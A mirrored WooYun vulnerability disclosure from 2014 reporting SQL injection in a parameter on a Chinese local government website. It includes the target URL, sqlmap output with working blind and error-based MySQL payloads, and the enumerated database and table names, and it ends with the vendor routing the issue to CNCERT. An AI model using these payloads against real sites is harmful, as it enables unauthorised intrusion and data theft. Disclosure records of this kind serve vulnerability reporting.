乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-02-13: 细节已通知厂商并且等待厂商处理中 2014-02-18: 厂商已经确认,细节仅向厂商公开 2014-02-28: 细节向核心白帽子及相关领域专家公开 2014-03-10: 细节向普通白帽子公开 2014-03-20: 细节向实习白帽子公开 2014-03-30: 细节向公众公开
之前有过一个了,发现只有那个文件被补上了,指哪补哪的节奏,换个文件继续注射,跑表走人
http://www.gaoyou.gov.cn/gzcy/gzcy_bmxx_submit.php?depart_bianhao=15&depart_name=%B0%B2%BC%E0%BE%D6
sqlmap identified the following injection points with a total of 16 HTTP(s) requests:---Place: GETParameter: depart_bianhao Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: depart_bianhao=15' AND 5972=5972 AND 'EWEV'='EWEV&depart_name=%B0%B2%BC%E0%BE%D6 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: depart_bianhao=15' AND (SELECT 3893 FROM(SELECT COUNT(*),CONCAT(0x716d777771,(SELECT (CASE WHEN (3893=3893) THEN 1 ELSE 0 END)),0x71786e6e71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rtFs'='rtFs&depart_name=%B0%B2%BC%E0%BE%D6---web application technology: Apache, PHP 5.4.7back-end DBMS: MySQL 5.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: depart_bianhao Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: depart_bianhao=15' AND 5972=5972 AND 'EWEV'='EWEV&depart_name=%B0%B2%BC%E0%BE%D6 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: depart_bianhao=15' AND (SELECT 3893 FROM(SELECT COUNT(*),CONCAT(0x716d777771,(SELECT (CASE WHEN (3893=3893) THEN 1 ELSE 0 END)),0x71786e6e71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rtFs'='rtFs&depart_name=%B0%B2%BC%E0%BE%D6---web application technology: Apache, PHP 5.4.7back-end DBMS: MySQL 5.0Database: cdcol[1 table]+---------------------------------------+| cds |+---------------------------------------+Database: gy[81 tables]+---------------------------------------+| accessory || ad || ad_all || addgroup || bbcode || cdb_access || cdb_activities || cdb_activityapplies || cdb_adminactions || cdb_admincustom || cdb_admingroups || cdb_adminnotes || cdb_adminsessions || cdb_advcaches || cdb_advertisements || cdb_announcements || cdb_attachments || cdb_attachpaymentlog || cdb_attachtypes || cdb_banned || cdb_bbcodes || cdb_buddys || cdb_caches || cdb_campaigns || cdb_creditslog || cdb_crons || cdb_debateposts || cdb_debates || cdb_failedlogins || cdb_faqs || cdb_favorites || cdb_forumfields || cdb_forumlinks || cdb_forumrecommend || cdb_forums || cdb_imagetypes || cdb_invites || cdb_itempool || cdb_magiclog || cdb_magicmarket || cdb_magics || cdb_medallog || cdb_medals || cdb_memberfields || cdb_membermagics || cdb_members || chat_bg || chat_stat || chat_zhyao || chatinfo2 || chatinfo23 || chatmain || chatroom || chatroom_dbzx || chatroom_hfrx || chatroom_view || chattype || chatuser || choicetime || db_access || db_admingroups || db_adminsessions || db_announcements || db_attachments || db_attachtypes || db_banned || db_bbcodes || db_buddys || db_bzsm || db_caches || db_failedlogins || db_favorites || db_forumlinks || db_forums || db_gkml || db_gkzn || db_karmalog || db_members || db_onlinelist || db_plugins || db_plugins_settings |+---------------------------------------+Database: information_schema[37 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || INNODB_CMP || INNODB_CMPMEM || INNODB_CMPMEM_RESET || INNODB_CMP_RESET || INNODB_LOCKS || INNODB_LOCK_WAITS || INNODB_TRX || KEY_COLUMN_USAGE || PARAMETERS || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLESPACES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+
和去年9月份一样修补,然后过几个月又会有漏洞报告
危害等级:中
漏洞Rank:10
确认时间:2014-02-18 10:09
已经与此前的漏洞一并转由CNCERT下发给江苏分中心处置。
暂无